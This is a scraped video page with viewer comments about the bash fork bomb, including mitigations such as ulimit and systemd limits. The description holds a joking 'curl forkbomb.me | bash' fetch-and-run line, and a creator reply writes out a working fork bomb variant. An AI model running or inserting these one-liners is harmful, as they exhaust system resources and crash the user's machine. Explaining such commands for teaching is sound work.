this one-liner will crash your system

Поделиться
HTML-код
  • Опубликовано: 20 сен 2024
  • Do not 'curl forkbomb.me | bash' :-)

Комментарии • 17

  • @Dan-vu3vt
    @Dan-vu3vt 3 месяца назад +14

    Making that function more readable is an awesome way of teaching what it does.

  • @boas_
    @boas_ 3 месяца назад +8

    So basically a nuclear bomb

  • @matthewperiut7508
    @matthewperiut7508 3 месяца назад +3

    Tested it on my macbook which is bsd based, and surprisingly there was a level of protection, so it didn't crash my system interestingly enough! Great video!

  • @keshamix_
    @keshamix_ 3 месяца назад +1

    Greta video, honestly. Well-spoken, confident, nice editing. Wish you look at growing big

  • @olifloof
    @olifloof 3 месяца назад +5

    iirc most distros using systemd mitigate forkbombs by setting a ulimit

    • @MalwareCube
      @MalwareCube  3 месяца назад +1

      Yep, you can set limits on systemd unit files, and you can also set a ulimit to a smaller value in login scripts.

  • @Markadown
    @Markadown 3 месяца назад +1

    This was pretty cool.

  • @NoNoandNo-no
    @NoNoandNo-no 6 дней назад

    Hi Andrew, I wanted to ask this during the Cyber Mentor live session, but I missed the notification, unfortunately. Do I need to learn Python and scripting for a SOC analyst role? If so, where should I start?

    • @MalwareCube
      @MalwareCube  6 дней назад

      @NoNoandNo-no yeah it can be useful as you progress in the SOC or move into more engineering roles. I wouldn't put it as a requirement as an entry level analyst (meaning I think there are other areas that should take priority first) but you'll sometimes see it as a "nice to have " on job postings. I can only suggest TCM's python course as personally I haven't taken any others to compare, but I thought it was a great foundation.

  • @li-lunarink
    @li-lunarink 3 месяца назад +4

    why no comments man

  • @nikhils7583
    @nikhils7583 3 месяца назад +1

    This was nice.😅

  • @W0lfCL
    @W0lfCL 3 месяца назад

    I don't get why there's a pipilne there. Like I always thought that command1 | command2 redirects the output of the command1 to the input of the command2
    Why is it :|: and not something like :&&: ???

    • @MalwareCube
      @MalwareCube  3 месяца назад +3

      Great question, and you're correct about the pipe. In this case, the actual data or output being passed through the pipe is not used. If a process takes nothing into stdin, you can still pipe to it. Using && would make the second call dependent on the successful completion of the first call, and so the pipe is used to execute both recursive calls in parallel without conditions. To your point, ":(){ :&:; }; :" will also work in most cases.

    • @W0lfCL
      @W0lfCL 3 месяца назад +1

      @@MalwareCube thx for making this clear

  • @ZaynorMC
    @ZaynorMC 3 месяца назад +3

    Why make it so unnecessarily complex? Just keep it simple and run "make -j"

  • @JarppaGuru
    @JarppaGuru 3 месяца назад

    one liner admin is better